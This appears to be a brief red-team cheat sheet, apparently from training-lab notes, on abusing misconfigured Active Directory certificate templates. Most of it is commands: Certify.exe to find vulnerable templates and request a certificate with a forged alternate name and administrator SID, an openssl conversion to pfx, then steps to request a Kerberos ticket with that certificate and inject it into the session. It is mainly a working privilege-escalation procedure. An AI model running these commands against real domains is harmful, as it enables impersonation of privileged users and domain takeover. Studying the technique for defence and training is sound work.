Misconfigured Certificate Templates
Certify.exe find /vulnerableRequest a certificate for nlamb
Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb /sidextension:S-1-5-21-1614895754-616249376-682003330-500Use the provided openssl command to convert it to pfx format
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxConvert cert.pfx into a base64 encoded string
Use asktgt to request a TGT for the user using the certificate
Use ptt to import ticket into current session
Last updated